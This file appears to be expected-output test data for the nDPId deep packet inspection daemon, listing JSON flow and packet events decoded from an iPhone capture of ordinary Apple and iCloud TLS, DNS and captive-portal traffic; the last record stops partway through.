00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598377,"flow_last_seen":1582454598414,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598414,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598416,"flow_last_seen":1582454598416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598416,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454598416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598416,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWSAbt\/OqmMAAAAALDC\/\/8OTwAAAgQFtAEDAwcBAQgKEd\/ndwAAAAAEAgAA"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598418,"flow_last_seen":1582454598418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598418,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454598418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598418,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWTAbsyJO8VAAAAALDC\/\/8V2QAAAgQFtAEDAwcBAQgKEd\/neQAAAAAEAgAA"}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454598426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598426,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQBQwACbtSzNLJXrMqBScNC85AAAAgQFrAQCCAodNCSFEd\/nTQEDAwg="}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454598427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598427,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGslMRggIuwKgCEQG7xZHfrwWiGTrrGKBSqbCWRAAAAgQFrAQCCAq1T9HeEd\/nUwEDAw4="}
00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454598453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598453,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZNpWNRgMiTvFqBScNC35wAAAgQFrAQCCAoAH8DDEd\/neQEDAwg="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454598459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598459,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZLy+qnpfzqpjaBScNDegAAAAgQFrAQCCAqK\/qiVEd\/ndwEDAwg="}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454598542,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598542,"pkt":"xiwDYGpkxGGLNYKpCABFAABAIN8AAP8RFWvAqAIRwKgCAc50ADUALLvssQ8BAAABAAAAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQAB"}
00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454598544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598544,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysAAAFAslesym7UszoAQCBZUCQAAAQEIChHf5+gdNCSF"}
00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZFvAqAIREYICLsWRAbsZOusY368Fo4AQBAtqWAAAAQEIChHf5\/C1T9He"}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWTAbsyJO8WaVjUYYAQBAtTNAAAAQEIChHf5\/cAH8DD"}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWSAbt\/OqmN8vqp6oAQBAt5ywAAAQEIChHf5\/eK\/qiV"}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454598544,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598544,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysAAAFAslesym7UszoAQCBZUCQAAAQEIChHf5+gdNCSF"}
00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1582454598545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZFvAqAIREYICLsWRAbsZOusY368Fo4AQBAtqWAAAAQEIChHf5\/C1T9He"}
00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWTAbsyJO8WaVjUYYAQBAtTNAAAAQEIChHf5\/cAH8DD"}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWSAbt\/OqmN8vqp6oAQBAt5ywAAAQEIChHf5\/eK\/qiV"}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p